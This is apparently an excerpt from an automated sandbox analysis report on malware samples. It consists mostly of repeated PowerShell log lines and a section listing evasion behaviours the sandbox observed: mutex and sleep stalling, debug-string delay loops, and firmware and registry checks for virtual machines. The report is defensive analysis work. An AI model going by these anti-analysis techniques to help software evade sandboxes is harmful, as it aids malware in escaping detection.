Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

Found evasive API chain (may stop execution after checking mutex)

Source: C:\ProgramData\Program\iusb3mon.exe

Evasive API call chain: CreateMutex,DecisionNodes,Sleep

graph_30-35366

Found stalling execution ending in API Sleep call

Source: C:\ProgramData\Program\iusb3mon.exe

Stalling execution: Execution stalls by calling Sleep

graph_30-35450

Query firmware table information (likely to detect VMs)

Source: C:\Users\Public\Documents\UfHE8OB\MTGHu7b.exe	System information queried: FirmwareTableInformation
Source: C:\Users\Public\Documents\UfHE8OB\MTGHu7b.exe	System information queried: FirmwareTableInformation
Source: C:\ProgramData\Program\iusb3mon.exe	System information queried: FirmwareTableInformation
Source: C:\ProgramData\Program\iusb3mon.exe	System information queried: FirmwareTableInformation

Tries to delay execution (extensive OutputDebugStringW loop)

Source: C:\ProgramData\Program\iusb3mon.exe	Section loaded: OutputDebugStringW count: 274
Source: C:\Users\Public\Documents\UfHE8OB\MTGHu7b.exe	Section loaded: OutputDebugStringW count: 1926

Tries to detect sandboxes / dynamic malware analysis system (registry check)

Source: C:\Users\Public\Documents\UfHE8OB\MTGHu7b.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: C:\ProgramData\Program\iusb3mon.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__

Source: C:\ProgramData\Program\iusb3mon.exe	Registry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDesc
Source: C:\ProgramData\Program\iusb3mon.exe	Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion
Source: C:\ProgramData\Program\iusb3mon.exe	Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersion

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 4318	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 2179	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 5384	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 363	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 4577	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 1851	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 4004	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 2061	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 3013
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 1636
Source: C:\Users\Public\Documents\UfHE8OB\MTGHu7b.exe	Window / User API: threadDelayed 1970
Source: C:\Users\Public\Documents\UfHE8OB\MTGHu7b.exe	Window / User API: threadDelayed 2407
Source: C:\Users\Public\Documents\UfHE8OB\MTGHu7b.exe	Window / User API: threadDelayed 2019
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 796
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 930
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 1007
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 1253
Source: C:\ProgramData\Program\iusb3mon.exe	Window / User API: threadDelayed 2118
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 4901
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 6100
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 2668
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 2920
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 2625
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 4475
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 4479
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 591
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 4769
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 4557
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 4586
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 5142
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 1054
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 5584
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 3190
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 3801
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 2668
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 705
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 1459
